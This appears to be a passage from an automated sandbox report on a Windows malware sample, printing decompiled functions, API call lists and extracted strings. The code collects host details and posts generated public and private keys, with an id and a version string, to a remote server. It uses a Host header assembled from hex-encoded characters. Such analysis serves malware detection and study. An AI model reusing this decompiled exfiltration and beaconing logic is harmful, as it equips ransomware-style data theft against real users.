				CHAR* _v184;
				int _v192;
				void* _v196;
				CHAR* _v200;
				CHAR* _v204;
				WCHAR* _v208;
				void* _v212;
				void* _v216;
				signed int _v220;
				short* _v224;
				void* _v228;
				void* _v232;
				void* _v236;
				CHAR* _v240;
				CHAR* _v268;
				void* __esi;
				CHAR* _t134;
				void* _t136;
				int _t146;
				void* _t149;
				int _t150;
				signed int _t151;
				void* _t153;
				int _t159;
				signed int _t167;
				signed int _t171;
				CHAR* _t178;
				int _t179;
				CHAR* _t182;
				void* _t191;
				long _t195;
				void _t210;
				int _t211;
				intOrPtr _t215;
				int _t216;
				char _t217;
				long _t226;
				int _t239;
				char* _t240;
				void* _t244;
				void* _t245;
				void* _t248;
				long _t250;
				signed int _t254;
				CHAR* _t256;
				int _t259;
				int _t260;
				void* _t261;
				void* _t266;
				CHAR* _t267;
				void* _t270;
				CHAR* _t273;
				long _t276;
				CHAR* _t277;
				char* _t279;
				signed int _t282;
				int _t283;
				long _t286;
				void* _t287;
				void* _t288;
				WCHAR* _t289;
				WCHAR* _t290;
				void* _t291;
				WCHAR* _t292;
				WCHAR* _t294;
				int _t297;
				long _t298;
				void* _t299;
				CHAR* _t300;
				int _t302;
				signed int _t303;
				void* _t307;

				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_v184 = __ecx;
				_v160 = __edx;
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_t307 = (_t303 & 0xfffffff8) - 0x9c;
				_push(1);
				_push(__ecx);
				_push(1);
				E0F693BC0( &_v148);
				E0F697490( &_v236, __edx); // executed
				_t266 = E0F6972A0( &_v236);
				_t282 = _a8 + __edx;
				_t7 = _t282 + 8; // 0x8
				_t226 = _t266 + _t7 * 8 << 3;
				_t134 = VirtualAlloc(0, _t226, 0x3000, 0x40); // executed
				_t259 = 0;
				_v240 = _t134;
				_v268 = _t134;
				_t239 = 0x30 + (_t266 + _t282 * 4) * 8;
				if(_t134 == 0 || _t239 >= _t226) {
					_v176 = _t259;
					_t267 = _t134;
				} else {
					_t267 = _t239 + _t134;
					_v176 = _t134;
					_v184 = _t267;
					_t259 = _t239;
				}
				_t136 = 2 + _a8 * 8;
				if(_v156 == 0) {
					L7:
					_t240 = 0;
					_v172 = 0;
				} else {
					_t302 = _t259 + _t136;
					if(_t302 >= _t226) {
						goto L7;
					} else {
						_t240 = _t267;
						_v172 = _t267;
						_t267 =  &(_t267[_t136]);
						_t259 = _t302;
						_v184 = _t267;
					}
				}
				_t283 = _v164;
				if(_v156 == 0 || 2 + _t283 * 8 + _t259 >= _t226) {
					_t267 = 0;
					_v184 = 0;
				}
				if(_t240 == 0) {
					L58:
					VirtualFree(_v156, 0, 0x8000);
					E0F697D70( &_v152);
					return 1;
				} else {
					_t260 = _a8;
					_v160 = _t260 + _t260;
					CryptBinaryToStringA(_a4, _t260, 0x40000001, _t240,  &_v160);
					_v176 = _t283 + _t283;
					CryptBinaryToStringA(_v204, _t283, 0x40000001, _t267,  &_v176);
					_t146 = lstrlenA(_t267);
					_t286 = _t146 + lstrlenA(_v204) + 0x42;
					_t149 = VirtualAlloc(0, _t286, 0x3000, 0x40); // executed
					_v196 = _t149;
					_v200 = _t149;
					_v220 = 0;
					_t150 = lstrlenA(_v204);
					_t261 = _v196;
					_t151 = _t150 + 1;
					if(_t261 == 0 || _t151 >= _t286) {
						_v212 = 0;
					} else {
						_v220 = _t151;
						_v200 = _t261 + _t151;
						_v212 = _t261;
					}
					_t153 = lstrlenA(_t267) + 1;
					if(_v196 == 0 || _t153 + _v220 >= _t286) {
						_v200 = 0;
					}
					_t287 = 0;
					if(lstrlenA(_v204) != 0) {
						_t279 = _v212;
						do {
							_t256 = _v204;
							_t217 =  *((intOrPtr*)(_t287 + _t256));
							if(_t217 != 0xa && _t217 != 0xd) {
								 *_t279 = _t217;
								_t279 = _t279 + 1;
							}
							_t287 = _t287 + 1;
						} while (_t287 < lstrlenA(_t256));
						_t267 = _v216;
					}
					_t288 = 0;
					if(lstrlenA(_t267) != 0) {
						_t254 = _v200;
						_v220 = _t254;
						do {
							_t215 =  *((intOrPtr*)(_t288 + _t267));
							if(_t215 != 0xa && _t215 != 0xd) {
								 *_t254 = _t215;
								_v220 = _t254 + 1;
							}
							_t288 = _t288 + 1;
							_t216 = lstrlenA(_t267);
							_t254 = _v220;
						} while (_t288 < _t216);
					}
					_t289 = _v208;
					lstrcatW(_t289, L"action=call&");
					_t290 =  &(_t289[lstrlenW(_t289)]);
					_v216 = _t290;
					E0F6970A0( &_v184, _t290); // executed
					_v224 = 0;
					_v208 = 0;
					_t159 = E0F6935C0( &_v224,  &_v208); // executed
					if(_t159 == 0) {
						ExitProcess(_t159); // executed
					}
					lstrcatW(_t290, L"&id=");
					_t270 = _v220;
					lstrcatW(_t290, _t270);
					lstrcatW(_t290, L"&subid=");
					_t291 = _v204;
					lstrcatW(_v216, _t291);
					VirtualFree(_t270, 0, 0x8000);
					VirtualFree(_t291, 0, 0x8000);
					_t292 = _v216;
					lstrcatW(_t292, L"&pub_key=");
					_t167 = lstrlenW(_t292);
					MultiByteToWideChar(0xfde9, 0, _v212, 0xffffffff,  &(_t292[_t167]), lstrlenA(_v212));
					_t294 = _v216;
					lstrcatW(_t294, L"&priv_key=");
					_t171 = lstrlenW(_t294);
					_t273 = _v200;
					MultiByteToWideChar(0xfde9, 0, _t273, 0xffffffff,  &(_t294[_t171]), lstrlenA(_t273));
					lstrcatW(_v216, L"&version=2.3.1r");
					_t276 = (lstrlenW(_v208) << 4) + 0x12;
					_v216 = VirtualAlloc(0, _t276, 0x3000, 0x40);
					_t244 = 2 + lstrlenW(_v208) * 8;
					_t178 = _v216;
					if(_t178 == 0 || _t244 >= _t276) {
						_t277 = 0;
					} else {
						_t277 = _t178;
					}
					_t179 = lstrlenW(_v208);
					_t245 =  *0xf6a2a78; // 0x0
					_v220 = _t179;
					if(_t245 != 0) {
						VirtualFree(_t245, 0, 0x8000);
					}
					_t182 = VirtualAlloc(0, lstrlenW(L"popkadurak") + 2, 0x3000, 4);
					 *0xf6a2a78 = _t182;
					if(_t182 != 0) {
						wsprintfA(_t182, "%S", L"popkadurak");
						_t307 = _t307 + 0xc;
					}
					_t297 = _v220 + _v220;
					E0F695F00(_v208, _t297, _t297);
					_v192 = _v220 * 8;
					if(CryptBinaryToStringA(_v208, _t297, 0x40000001, _t277,  &_v192) == 0) {
						GetLastError();
					}
					_t104 = lstrlenA(_t277) + 2; // 0x2
					_t298 = _t104;
					_v228 = VirtualAlloc(0, _t298, 0x3000, 0x40);
					_t106 = lstrlenA(_t277) + 1; // 0x1
					_t248 = _t106;
					_t191 = _v228;
					if(_t191 == 0) {
						L46:
						_v216 = 0;
					} else {
						_v216 = _t191;
						if(_t248 >= _t298) {
							goto L46;
						}
					}
					_t299 = 0;
					if(lstrlenA(_t277) != 0) {
						_v236 = _v216;
						do {
							_t210 =  *((intOrPtr*)(_t299 + _t277));
							if(_t210 != 0xa && _t210 != 0xd) {
								 *_t248 = _t210;
								_v236 = _t248 + 1;
							}
							_t299 = _t299 + 1;
							_t211 = lstrlenA(_t277);
							_t248 = _v236;
						} while (_t299 < _t211);
					}
					_t300 = _v216;
					MultiByteToWideChar(0xfde9, 0, _t300, 0xffffffff, _v224, lstrlenA(_t300));
					_v236 = 0;
					_t195 = E0F6954F0(_t300,  &_v236, _t248, 1);
					if(_t195 != 0) {
						_t250 = _v236;
						if(_t250 != 0) {
							 *_a12 = _t250;
						}
						VirtualFree(_v228, 0, 0x8000);
						VirtualFree(_v232, 0, 0x8000);
						VirtualFree(_v212, 0, 0x8000);
						goto L58;
					} else {
						VirtualFree(_v228, _t195, 0x8000);
						VirtualFree(_v232, 0, 0x8000);
						VirtualFree(_v212, 0, 0x8000);
						VirtualFree(_v204, 0, 0x8000);
						E0F697D70( &_v200);
						return 0;
					}
				}
			}

0x0f69586f
0x0f695870
0x0f695872
0x0f695873
0x0f695878
0x0f69587e
0x0f695882
0x0f695884
0x0f695885
0x0f695887
0x0f695888
0x0f69588a
0x0f69588b
0x0f69588d
0x0f69588e
0x0f695890
0x0f695893
0x0f695895
0x0f695896
0x0f69589f
0x0f6958a8
0x0f6958b9
0x0f6958bb
0x0f6958c4
0x0f6958ca
0x0f6958d0
0x0f6958d6
0x0f6958d8
0x0f6958dc
0x0f6958e3
0x0f6958ec
0x0f695901
0x0f695905
0x0f6958f2
0x0f6958f2
0x0f6958f5
0x0f6958f9
0x0f6958fd
0x0f6958fd
0x0f69590f
0x0f695916
0x0f69592f
0x0f69592f
0x0f695931
0x0f695918
0x0f695918
0x0f69591d
0x00000000
0x0f69591f
0x0f69591f
0x0f695921
0x0f695925
0x0f695927
0x0f695929
0x0f695929
0x0f69591d
0x0f69593a
0x0f69593e
0x0f69594d
0x0f69594f
0x0f69594f
0x0f69595b
0x0f695d98
0x0f695da3
0x0f695da9
0x0f695db9
0x0f695961
0x0f695961
0x0f69596d
0x0f695980
0x0f695985
0x0f695999
0x0f6959a2
0x0f6959b6
0x0f6959bb
0x0f6959c5
0x0f6959c9
0x0f6959cd
0x0f6959d5
0x0f6959d7
0x0f6959db
0x0f6959de
0x0f6959f5
0x0f6959e4
0x0f6959e7
0x0f6959eb
0x0f6959ef
0x0f6959ef
0x0f695a00
0x0f695a06
0x0f695a10
0x0f695a10
0x0f695a1c
0x0f695a22
0x0f695a24
0x0f695a30
0x0f695a30
0x0f695a34
0x0f695a39
0x0f695a3f
0x0f695a41
0x0f695a41
0x0f695a43
0x0f695a46
0x0f695a4a
0x0f695a4a
0x0f695a4f
0x0f695a55
0x0f695a57
0x0f695a5b
0x0f695a60
0x0f695a60
0x0f695a65
0x0f695a6b
0x0f695a6e
0x0f695a6e
0x0f695a73
0x0f695a74
0x0f695a76
0x0f695a7a
0x0f695a60
0x0f695a7e
0x0f695a8e
0x0f695a9b
0x0f695a9f
0x0f695aa3
0x0f695aac
0x0f695ab8
0x0f695ac0
0x0f695ac7
0x0f695aca
0x0f695aca
0x0f695ad6
0x0f695ad8
0x0f695ade
0x0f695aea
0x0f695af0
0x0f695af9
0x0f695b0d
0x0f695b17
0x0f695b19
0x0f695b23
0x0f695b30
0x0f695b4a
0x0f695b50
0x0f695b5a
0x0f695b61
0x0f695b63
0x0f695b79
0x0f695b88
0x0f695ba6
0x0f695bb6
0x0f695bbc
0x0f695bc3
0x0f695bc9
0x0f695bd3
0x0f695bcf
0x0f695bcf
0x0f695bcf
0x0f695bd9
0x0f695bdb
0x0f695be1
0x0f695be7
0x0f695bf1
0x0f695bf1
0x0f695c0b
0x0f695c11
0x0f695c18
0x0f695c25
0x0f695c2b
0x0f695c2b
0x0f695c36
0x0f695c3b
0x0f695c4b
0x0f695c67
0x0f695c69
0x0f695c69
0x0f695c79
0x0f695c79
0x0f695c86
0x0f695c8c
0x0f695c8c
0x0f695c8f
0x0f695c95
0x0f695c9f
0x0f695c9f
0x0f695c97
0x0f695c97
0x0f695c9d
0x00000000
0x00000000
0x0f695c9d
0x0f695ca8
0x0f695cae
0x0f695cb4
0x0f695cb8
0x0f695cb8
0x0f695cbd
0x0f695cc3
0x0f695cc6
0x0f695cc6
0x0f695ccb
0x0f695ccc
0x0f695cce
0x0f695cd2
0x0f695cb8
0x0f695cd6
0x0f695cec
0x0f695cf9
0x0f695d03
0x0f695d0d
0x0f695d5c
0x0f695d62
0x0f695d67
0x0f695d67
0x0f695d7b
0x0f695d89
0x0f695d96
0x00000000
0x0f695d0f
0x0f695d20
0x0f695d2e
0x0f695d3b
0x0f695d48
0x0f695d4e
0x0f695d5b
0x0f695d5b
0x0f695d0d

APIs

Part of subcall function 0F693BC0: GetProcessHeap.KERNEL32(?,?,0F694807,00000000,?,00000000,00000000), ref: 0F693C5C

Part of subcall function 0F697490: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F6974B7
Part of subcall function 0F697490: GetUserNameW.ADVAPI32(00000000,?), ref: 0F6974C8
Part of subcall function 0F697490: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F6974E6
Part of subcall function 0F697490: GetComputerNameW.KERNEL32 ref: 0F6974F0
Part of subcall function 0F697490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F697510
Part of subcall function 0F697490: wsprintfW.USER32 ref: 0F697551
Part of subcall function 0F697490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F69756E
Part of subcall function 0F697490: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F697592
Part of subcall function 0F697490: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F694810,?), ref: 0F6975B6
Part of subcall function 0F697490: RegCloseKey.KERNEL32(00000000), ref: 0F6975D2

Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F6972F2
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F6972FD
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697313
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F69731E
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697334
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F69733F
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697355
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(0F694B36,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697360
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697376
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697381
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697397
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F6973A2
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F6973C1
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F6973CC

VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 0F6958D0
CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0F695980
CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0F695999
lstrlenA.KERNEL32(00000000), ref: 0F6959A2
lstrlenA.KERNEL32(?), ref: 0F6959AA
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 0F6959BB
lstrlenA.KERNEL32(?), ref: 0F6959D5
lstrlenA.KERNEL32(00000000), ref: 0F6959FE
lstrlenA.KERNEL32(?), ref: 0F695A1E

Strings

&pub_key=, xrefs: 0F695B1D
&subid=, xrefs: 0F695AE4
&version=2.3.1r, xrefs: 0F695B7F
popkadurak, xrefs: 0F695BFE, 0F695C1A
&priv_key=, xrefs: 0F695B54
action=call&, xrefs: 0F695A88
&id=, xrefs: 0F695AD0

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocVirtual$BinaryCryptNameString$CloseComputerHeapOpenProcessQueryUserValuewsprintf
String ID: &id=$&priv_key=$&pub_key=$&subid=$&version=2.3.1r$action=call&$popkadurak
API String ID: 1618292170-4215222798
Opcode ID: a3733c7df8871fea9e28c62d0cf45db14357c4f7abab70d647057f402c253246
Instruction ID: 251f26755e7d045f0ee8b96d5557c2516320f3e9045ff7f972b4d7577b8badfd
Opcode Fuzzy Hash: a3733c7df8871fea9e28c62d0cf45db14357c4f7abab70d647057f402c253246
Instruction Fuzzy Hash: EBF1BB71208301AFDB11DF24CC85B6BBBE8EF88724F04491DF586A7291DB74E905CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0F698050 Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 131
networkfilememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0F698050(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
				long _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				short _v68;
				void* _t38;
				void* _t40;
				WCHAR* _t41;
				long _t54;
				long _t59;
				WCHAR* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t67;

				_t64 = __ecx;
				_t38 =  *(__ecx + 4);
				if(_t38 != 0) {
					InternetCloseHandle(_t38);
				}
				E0F697E40(_t64); // executed
				_t40 = InternetConnectW( *(_t64 + 4), _a4, 0x50, 0, 0, 3, 0, 0); // executed
				_t65 = _t40;
				_v12 = 0;
				_v16 = _t65;
				if(_t65 != 0) {
					_t41 = VirtualAlloc(0, 0x2800, 0x3000, 0x40); // executed
					_t62 = _t41;
					_v20 = _t62;
					wsprintfW(_t62, L"%s", _a8);
					_t63 = HttpOpenRequestW(_t65, _a36, _t62, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
					if(_t63 != 0) {
						_v68 = 0x6f0048;
						_v64 = 0x740073;
						_v60 = 0x20003a;
						_v56 = 0x6f0070;
						_v52 = 0x69006c;
						_v48 = 0x690074;
						_v44 = 0x720061;
						_v40 = 0x6d006f;
						_v36 = 0x6e0061;
						_v32 = 0x2e0061;
						_v28 = 0x690062;
						_v24 = 0x74;
						if(HttpAddRequestHeadersW(_t63,  &_v68, 0xffffffff, 0) != 0) {
							if(HttpSendRequestW(_t63, _a40, _a44, _a12, _a16) == 0) {
								GetLastError();
							} else {
								_t67 = _a20;
								_t59 = _a24 - 1;
								_a4 = 0;
								if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
									while(1) {
										_t54 = _a4;
										if(_t54 == 0) {
											goto L13;
										}
										 *((char*)(_t54 + _t67)) = 0;
										_a4 = 0;
										_v12 = 1;
										if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
											continue;
										} else {
										}
										goto L13;
									}
								}
							}
						}
					}
					L13:
					InternetCloseHandle(_t63); // executed
					InternetCloseHandle(_v16);
					VirtualFree(_v20, 0, 0x8000); // executed
					return _v12;
				} else {
					return _t40;
				}
			}

0x0f698058
0x0f69805b
0x0f698060
0x0f698063
0x0f698063
0x0f69806b
0x0f698082
0x0f698088
0x0f69808a
0x0f698091
0x0f698096
0x0f6980af
0x0f6980b8
0x0f6980c0
0x0f6980c3
0x0f6980e7
0x0f6980eb
0x0f6980f8
0x0f698101
0x0f698108
0x0f69810f
0x0f698116
0x0f69811d
0x0f698124
0x0f69812b
0x0f698132
0x0f698139
0x0f698140
0x0f698147
0x0f698156
0x0f69816d
0x0f6981bc
0x0f69816f
0x0f698175
0x0f698178
0x0f69817d
0x0f69818c
0x0f698190
0x0f698190
0x0f698195
0x00000000
0x00000000
0x0f698197
0x0f6981a2
0x0f6981a9
0x0f6981b8
0x00000000
0x00000000
0x0f6981ba
0x00000000
0x0f6981b8
0x0f698190
0x0f69818c
0x0f69816d
0x0f698156
0x0f6981c2
0x0f6981c9
0x0f6981ce
0x0f6981da
0x0f6981e9
0x0f69809e
0x0f69809e
0x0f69809e

APIs

InternetCloseHandle.WININET(?), ref: 0F698063
InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0F698082
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,?,0F697046,ipv4bot.whatismyipaddress.com,0F69FF90), ref: 0F6980AF
wsprintfW.USER32 ref: 0F6980C3
HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 0F6980E1
HttpAddRequestHeadersW.WININET(00000000,?,000000FF,00000000), ref: 0F69814E
HttpSendRequestW.WININET(00000000,00690074,0069006C,00000000,00000074), ref: 0F698165
InternetReadFile.WININET(00000000,00690062,002E0060,00000000), ref: 0F698184
InternetReadFile.WININET(00000000,00690062,002E0060,00000000), ref: 0F6981B0
GetLastError.KERNEL32 ref: 0F6981BC
InternetCloseHandle.WININET(00000000), ref: 0F6981C9
InternetCloseHandle.WININET(00000000), ref: 0F6981CE
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F697046), ref: 0F6981DA

Strings

HTTP/1.1, xrefs: 0F6980D7
a, xrefs: 0F698139
H, xrefs: 0F6980F8
t, xrefs: 0F69811D
s, xrefs: 0F698101
b, xrefs: 0F698140
a, xrefs: 0F698132
t, xrefs: 0F698147
p, xrefs: 0F69810F
a, xrefs: 0F698124
o, xrefs: 0F69812B
l, xrefs: 0F698116
:, xrefs: 0F698108

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
String ID: :$H$HTTP/1.1$a$a$a$b$l$o$p$s$t$t
API String ID: 3906118045-2187218134
Opcode ID: eabe35495e375189fd47d11158ce9c932f0658ca61c215cc54ff7cae2bb79763
Instruction ID: e598b1a502c09dab2413adf875dac03877b44ebb167508edfb23051ee2fe809d
Opcode Fuzzy Hash: eabe35495e375189fd47d11158ce9c932f0658ca61c215cc54ff7cae2bb79763
Instruction Fuzzy Hash: BA417F31644209BBEF108F91DC48FAEBFBDEF05B65F504119F904A7291C7B69950CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0F694B20 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 182
threadsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _v8;
				void* _v12;
				CHAR* _v16;
				int _v20;
				void* _v24;
				int _v28;
				void* _v32;
				int _v36;
				int _v40;
				int _v44;
				int _v48;
				int _v52;
				int _v60;
				char _v80;
				void* _t54;
				void* _t55;
				int _t79;
				void* _t81;
				short* _t97;
				void* _t114;

				Sleep(0x3e8); // executed
				_t54 = E0F6947D0(_t90, _t106); // executed
				if(_t54 == 0) {
					_t55 = CreateThread(0, 0, E0F692D30, 0, 0, 0); // executed
					_v8 = _t55;
					if(_v8 != 0) {
						if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
							_t90 = _v8;
							TerminateThread(_v8, 0);
						}
						_t106 = _v8;
						CloseHandle(_v8); // executed
					}
					E0F6948C0(); // executed
					E0F6942B0(_t90, _t106); // executed
					E0F696550( &_v80); // executed
					_v40 = 0;
					_v36 = 0;
					_v28 = 0;
					_v44 = 0;
					E0F696500( &_v80,  &_v28,  &_v44,  &_v40,  &_v36);
					_v48 = 0;
					_v16 = 0;
					if(E0F694B00(_v28) == 0) {
						while(_v48 == 0) {
							_t81 = E0F695860(_v28, _v44, _v40, _v36,  &_v16); // executed
							_t114 = _t114 + 0xc;
							if(_t81 != 0) {
								_v48 = 1;
							} else {
								Sleep(0x2710);
							}
						}
						E0F6964C0( &_v80);
						_v32 = 0;
						_v20 = 0;
						_v52 = 0;
						_v60 = 0;
						__eflags = _v16;
						if(_v16 == 0) {
							L19:
							E0F694200();
							InitializeCriticalSection(0xf6a2a48);
							__eflags = _v52;
							if(__eflags == 0) {
								E0F693FF0( &_v80);
							} else {
								E0F6941D0(_v32, _v20, __eflags);
							}
							DeleteCriticalSection(0xf6a2a48);
							__eflags = E0F693C70();
							if(__eflags != 0) {
								E0F6945B0(__eflags);
							}
							_v24 = VirtualAlloc(0, 0x200, 0x3000, 4);
							__eflags = _v24;
							if(__eflags != 0) {
								GetModuleFileNameW(0, _v24, 0x100);
								E0F693DB0(_v24, _v24, __eflags);
								VirtualFree(_v24, 0, 0x8000);
							}
							__eflags =  *0xf6a2a44;
							if( *0xf6a2a44 != 0) {
								_t97 =  *0xf6a2a44; // 0x14d0000
								ShellExecuteW(0, L"open", _t97, 0, 0, 5);
							}
							ExitThread(0);
						}
						_v20 = lstrlenA(_v16);
						_v32 = VirtualAlloc(0, _v20, 0x3000, 4);
						_t79 = CryptStringToBinaryA(_v16, 0, 1, _v32,  &_v20, 0, 0);
						__eflags = _t79;
						if(_t79 != 0) {
							_v52 = 1;
							goto L19;
						}
						ExitProcess(0);
					} else {
						_v12 = VirtualAlloc(0, 0x200, 0x3000, 4);
						_t119 = _v12;
						if(_v12 != 0) {
							GetModuleFileNameW(0, _v12, 0x100);
							E0F693DB0(_v12,  &_v44, _t119);
							VirtualFree(_v12, 0, 0x8000);
						}
						ExitProcess(0);
					}
				}
				ExitProcess(0);
			}

0x0f694b2b
0x0f694b31
0x0f694b38
0x0f694b51
0x0f694b57
0x0f694b5e
0x0f694b74
0x0f694b78
0x0f694b7c
0x0f694b7c
0x0f694b82
0x0f694b86
0x0f694b86
0x0f694b8c
0x0f694b91
0x0f694b99
0x0f694b9e
0x0f694ba5
0x0f694bac
0x0f694bb3
0x0f694bcd
0x0f694bd2
0x0f694bd9
0x0f694bea
0x0f694c3b
0x0f694c53
0x0f694c58
0x0f694c5d
0x0f694c6c
0x0f694c5f
0x0f694c64
0x0f694c64
0x0f694c73
0x0f694c78
0x0f694c7d
0x0f694c84
0x0f694c8b
0x0f694c92
0x0f694c99
0x0f694c9d
0x0f694cef
0x0f694cef
0x0f694cf9
0x0f694cff
0x0f694d03
0x0f694d15
0x0f694d05
0x0f694d0b
0x0f694d0b
0x0f694d1f
0x0f694d2a
0x0f694d2c
0x0f694d2e
0x0f694d2e
0x0f694d47
0x0f694d4a
0x0f694d4e
0x0f694d5b
0x0f694d64
0x0f694d74
0x0f694d74
0x0f694d7a
0x0f694d81
0x0f694d89
0x0f694d97
0x0f694d97
0x0f694d9f
0x0f694d9f
0x0f694ca9
0x0f694cbf
0x0f694cd6
0x0f694cdc
0x0f694cde
0x0f694ce8
0x00000000
0x0f694ce8
0x0f694ce2
0x0f694bec
0x0f694c00
0x0f694c03
0x0f694c07
0x0f694c14
0x0f694c1d
0x0f694c2d
0x0f694c2d
0x0f694c35
0x0f694c35
0x0f694bea
0x0f694b3c

APIs

Sleep.KERNEL32(000003E8), ref: 0F694B2B

Part of subcall function 0F6947D0: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F69482C
Part of subcall function 0F6947D0: lstrcpyW.KERNEL32 ref: 0F69484F
Part of subcall function 0F6947D0: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F694856
Part of subcall function 0F6947D0: CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F69486E
Part of subcall function 0F6947D0: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F69487A
Part of subcall function 0F6947D0: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F694881
Part of subcall function 0F6947D0: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F69489B

ExitProcess.KERNEL32 ref: 0F694B3C
CreateThread.KERNEL32 ref: 0F694B51
WaitForSingleObject.KERNEL32(00000000,00001388), ref: 0F694B69
TerminateThread.KERNEL32(00000000,00000000), ref: 0F694B7C
CloseHandle.KERNEL32(00000000), ref: 0F694B86
VirtualAlloc.KERNEL32(00000000,00000200,00003000,00000004,00000000,00000000,00000000,00000000), ref: 0F694BFA
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F694C14
